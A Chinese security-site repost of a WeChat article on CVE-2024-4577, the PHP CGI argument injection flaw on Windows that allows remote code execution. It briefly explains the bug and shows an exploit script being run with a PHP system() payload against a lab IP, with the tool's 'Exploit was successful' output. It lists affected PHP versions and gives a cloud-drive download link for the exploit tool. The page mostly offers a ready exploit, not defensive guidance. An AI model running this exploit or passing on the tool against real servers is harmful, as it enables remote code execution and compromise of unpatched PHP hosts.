【含工具】PHP CGI 参数注入漏洞 (CVE-2024-4577) RCE

admin 2024年7月3日08:10:05评论3 views字数 856阅读2分51秒阅读模式
 

【含工具】PHP CGI 参数注入漏洞 (CVE-2024-4577) RCE

该漏洞仅影响 PHP 的 CGI 模式。在此模式下,Web 服务器解析 HTTP 请求并将其传递给 PHP 脚本,然后脚本对其进行一些处理。例如,查询字符串被解析并传递给命令行上的 PHP 解释器 - 例如,诸如 as 的请求http://host/cgi.php?foo=bar可能会被执行为php.exe cgi.php foo=bar。

python watchTowr-vs-php_cve-2024-4577.py -c "<?php system('calc');?>" -t http://192.168.253.132/test.sina
__ ___ ___________
__ _ ______ _/ |__ ____ | |___ ________ _ ________
/ / __ ___/ ___| | | | / _ / / _ __
/ / __ | | ___| Y | |( <_> / | | /
/_/ (____ |__| ___ |___|__|__ | __ / /_/ |__|
/ / /

watchTowr-vs-php_cve-2024-4577.py
(*) PHP CGI Argument Injection (CVE-2024-4577) discovered by Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
- Aliz Hammond, watchTowr ([email protected])
- Sina Kheirkhah (@SinSinology), watchTowr ([email protected])
CVEs: [CVE-2024-4577]
(^_^) prepare for the Pwnage (^_^)

(+) Exploit was successful

此漏洞影响 Windows 操作系统上安装的所有版本的 PHP:

PHP 8.3 < 8.3.8PHP 8.2 < 8.2.20PHP 8.1 < 8.1.29

下载地址

链接:https://pan.quark.cn/s/b92fb11382aa

 

原文始发于微信公众号(黑客白帽子):【含工具】PHP CGI 参数注入漏洞 (CVE-2024-4577) RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月3日08:10:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【含工具】PHP CGI 参数注入漏洞 (CVE-2024-4577) RCEhttps://cn-sec.com/archives/2844500.html

发表评论

匿名网友 填写信息